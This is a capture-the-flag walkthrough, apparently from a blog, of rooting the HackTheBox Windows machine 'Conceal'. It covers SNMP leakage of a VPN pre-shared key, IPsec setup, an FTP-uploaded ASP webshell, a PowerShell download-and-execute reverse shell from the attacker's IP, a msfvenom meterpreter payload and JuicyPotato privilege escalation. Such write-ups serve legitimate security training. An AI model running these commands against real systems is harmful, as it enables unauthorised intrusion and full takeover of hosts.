Conceal HackTheBox WalkThrough
This is Conceal HackTheBox machine walkthrough and is also the 23rd
machine of our OSCP like HTB Boxes
series. In this writeup I have demonstrated step-by-step how I rooted to Conceal HackTheBox
machine. But, before diving into the hacking part let us know something about this box. It is a Windows OS
machine with IP address 10.10.10.116
and difficulty hard
assigned by its maker.
Since this machine is retired
so you will require VIP
subscription at hackthebox.eu to access this machine. So first of all connect your Kali/Parrot machine with HackTheBox VPN
and confirm your connectivity with this machine by pinging its IP 10.10.10.116. If all goes correct then start hacking. As usual I started by scanning the machine. Scanning gives us some idea how we have to proceed further like it helps to find open and closed ports and gives us information of different services running over them. I have used Nmap for this task and the result is given below:-
Scanning
When I tried to perform Stealth Scan
(-sS) of all the ports it found no port as open because firewall is configured on each TCP ports and hence blocks scanning. Then I performed full UDP Scan
(-sU) and it found two ports
as open and that too under 1000 ports.
$ sudo nmap -sU -sV -T4 -p1-1000 10.10.10.116
Nmap found UDP ports 161
and 500
as open. SNMP
Server
is running on port 161 and ISAKMP
is running over port 500. Let us run default script (-sC) of nmap over these ports and see what it can find.
$ sudo nmap -sU -sC -T4 -p 500,161 10.10.10.116
Nmap scan with default script revealed a lot of useful information. snmp-netstat
script revealed that many number of TCP ports are listening. Also ike-version
script revealed conceal OS as Windows Server 8
. Since port 500 is open and IKE VPN server
is running over it we can connect to all the listening port only after connecting with IKE VPN. So let us enumerate more on these ports so that we can get some information for our VPN configuration file.
Now our next step is to enumerate on these two ports and gather as much information as we can. If you want to get more information like number of users & their names, exact OS version and services information on conceal machine you can run the following nmap commands with the attached scripts. These command will execute all snmp
and ike
scripts which is present in directory /usr/share/nmap/scripts/
on ports 161 and 500 respectively.
$ sudo nmap -sU -p161 --script snmp* 10.10.10.116
$ sudo nmap -sU -p500 --script ike* 10.10.10.116
We have got information about different ports and services running over them. Now let us use some service specific tool
to enumerate more on these ports. For SNMP enumeration I have used snmp-check.pl
(Perl script to perform SNMP enum). Simply copy the content from here and save in a file snmp-check.pl and run as given below. You can also use Kali built-in tool $snmpwalk
for this purpose. But snmp-check.pl
give information in more human readable form. I have used both the tools to show you the result.
SNMP Enumeration ~ 161
$ snmpwalk -v 2c -c public 10.10.10.116
$ vi snmp-check.pl
$ perl snmp-check.pl -t 10.10.10.116 -p 161
Both the tools have found IKE VPN password PSK Key. When I tried to crack this hash on crackstation.net I got the password Dudecake1!
.
IKE VPN password PSK – 9C8B1A372B1878851BE2C097031B6E43
: Dudecake1!
IPsec Enumeration ~ 500
$
ike-scan
on port 500 revealed that IKE version is v1
, authentication is using Pre Shared Key
and encryption is 3DES
. All these information is useful for making a VPN configuration file.
$ sudo ike-scan -M 10.10.10.116
I am going to use $strongswan
VPN client to connect with the VPN Server running on conceal machine.
$ sudo apt install strongswan
# to install on your Kali machine
You will also need to install these additional plugins
$ sudo apt install libstrongswan-standard-plugins libstrongswan-extra-plugins
Once we have installed them successfully let us edit our VPN configuration file. Since we are going to use IPsec protocol
to connect using VPN so we will need to edit the configuration file of IPsec. IPsec configuration file is located in /etc/
directory. Simply put the following code in ipsec.conf
file. Make sure to replace left=10.10.14.9
with your tun0
IP.
$ tail -16 /etc/ipsec.conf
config setupcharondebug="all"uniqueids=yesstrictcrlpolicy=noconn concealauthby=secretauto=addike=3des-sha1-modp1024!esp=3des-sha1!type=transportkeyexchange=ikev1left=10.10.14.9right=10.10.10.116rightsubnet=10.10.10.116[tcp]
Also put the following information in the ipsec.secrets
file after changing 10.10.14.9 with your tun0 IP.
$ sudo head -3 /etc/ipsec.secrets
# This file holds shared secrets or RSA private keys for authentication.10.10.14.9 10.10.10.116: PSK "Dudecake1!"# RSA private key for this host, authenticating it to any other host
$ tail -16 /etc/ipsec.conf
$ sudo head -3 /etc/ipsec.secrets
For more information on VPN file configuration of IPsec protocol check this link. Let us connect to VPN.
Connecting with IPsec VPN
$ sudo ipsec restart
$ sudo ipsec up conceal
$ sudo ipsec status
We are connected to IPsec VPN
. Let us again perform Nmap scan to check which port is open.
$ sudo nmap -sC -sV -sT -oA nmap/tcp_scan 10.10.10.116
Nmap found ports 21
, 80
, 135
, 139
and 445
as open. Microsoft ftpd
server is running over port 21 and ftp-anon
script revealed that anonymous login is allowed. Then immediately I tried to login into it by credential anonymous
: anonymous
. After some enumeration found that we can upload file to this server. To test this I created a simple txt file test.txt and uploaded it. Then tried to access the file at URL http://10.10.10.116/test.txt.
We can’t access the file, there may be chances that this file would be uploaded to some other folder. For knowing this I performed directory bruteforcing
using tool $dirsearch
and wordlist small.txt
. small.txt is present in the directory /usr/share/wordlists/dirb/
of Kali/Parrot.
$ sudo dirsearch -w /usr/share/wordlists/dirb/small.txt -u http://10.10.10.116/ -e all -t 40 | tee dirsearch.out
Directory bruteforcing found a folder upload and our uploaded file is present in this folder. So the URL where we can access our uploaded file is http://10.10.10.116/upload/test.txt.
Now my next step is to upload webshell
so that we can execute command on conceal machine and can get a reverse shell back on our Kali machine. Since it is an IIS server
so I tried to upload aspx
and asp
webshell because these files are mostly supported by IIS server. When I uploaded a webshell of aspx extension it didn’t execute because aspx extension is blocked on server. But when I uploaded asp webshell and run it in browser it is easily executed and we can now execute OS command through it. The link of webshell is this.
Login into FTP & Uploading Webshell
$ ftp 10.10.10.116
~anonymous
~anonymous
$ put webshell.asp
After uploading access the webshell at http://10.10.10.116/upload/webshell.asp.
$ ipconfig
We have got Remote Code Execution
on conceal. Let us upgrade this shell to an Interactive PowerShell so that we can access to conceal machine using command prompt. For this I am using nishang’s Invoke-PowerShellTcp.ps1
script. The repository link for nishang is this. First of all clone the repository to your /opt
folder then copy the file Invoke-PowerShellTcp.ps1
to a new file nishang.ps1
in current directory and add Invoke-PowerShellTcp -Reverse –IPAddress 10.10.14.9 -Port 4321
at the bottom of nishang.ps1 file. Now start python3 web server
in the same folder to host this file. And in other window start netcat
listener
on port 4321
.
$ sudo git clone https://github.com/samratashok/nishang
$ cd /home/deepak/HTB/Boxes/Conceal
$ cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 nishang.ps1
$ echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4321' >> nishang.ps1
$ sudo python3 -m http.server 80
Now run
powershell "IEX(New-Object Net.webClient).downloadString('http://10.10.14.9/nishang.ps1')"
in the webshell or alternatively go to URL
http://10.10.10.116/upload/webshell.asp?cmd=powershell+%22IEX(New-Object+Net.webClient).downloadString(%27http%3A%2F%2F10.10.14.9%2Fnishang.ps1%27)%22 to download nishang.ps1 and execute it on conceal machine.
$ nc -nvlp 4321
$ whoami
We have got Integrative PowerShell with user destitute
privilege. Let us capture user flag.
Capture User Flag
$ type C:\Users\Destitute\Desktop\proof.txt
Privilege Escalation
To escalate the privilege to admin we have to first find a privilege escalation vector using which we can perform privilege escalation.
Finding PrivEsc Vector
$ whoami /priv
command found token SeImpersonatePrivilege
is enabled
. This is actually a vulnerability and can be exploited by Juicy Potato
exploit. For more info about this vulnerability check this link and juicy potato link is this. The link of JuicyPotato.exe binary is this. When I exploited this machine using Juicy Potato exploit I could easily got admin shell. So here our potential PrivEsc vector is Privilege Escalation through Access Token Manipulation
. Check here hackthebox machine with similar PrivEsc Vector.
To exploit this vulnerability we will require a program that will be executed when we run juicy potato exploit. For this I have created shell.exe
file through $msfvenom
that will give us shell on $msfconsole
. So create shell.exe
using $msfvenom
and send it to conceal machine.
Creating & Uploading Shell
On Kali Machine
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.9 LPORT=4567 --arch x64 -f exe > shell.exe
$ python3 -m http.server 8000
On Conceal Machine
$ cd C:\Users\Destitute
$ certutil.exe -split -urlcache -f "http://10.10.14.9:8000/shell.exe" "shell.exe"
$ certutil.exe -split -urlcache -f "http://10.10.14.9:8000/JuicyPotato.exe" "JuicyPotato.exe"
We have successfully downloaded both the binaries to conceal machine. Let us get admin shell by exploiting the vulnerability.
Getting Admin Shell
On Kali Machine
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST 10.10.14.9
msf6 exploit(multi/handler) > set LPORT 4567
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > exploit
meterpreter > getuid
meterpreter > sysinfo
On Conceal Machine
$ & "C:\Users\Destitute\JuicyPotato.exe" -l 1337 -p "C:\Users\Destitute\shell.exe" -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"
We are NT AUTHORITY\SYSTEM
now. It is the highest privilege in windows OS. Let us capture root flag from Admin directory.
Capture Root Flag
meterpreter > search -f proof.txt "C:\Users"
meterpreter > cat "c:\Users\Administrator\Desktop\proof.txt"
This was how I rooted Conceal HackTheBox machine. Learnt a lot after this challenge, hope you have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion feel free to write us at [email protected].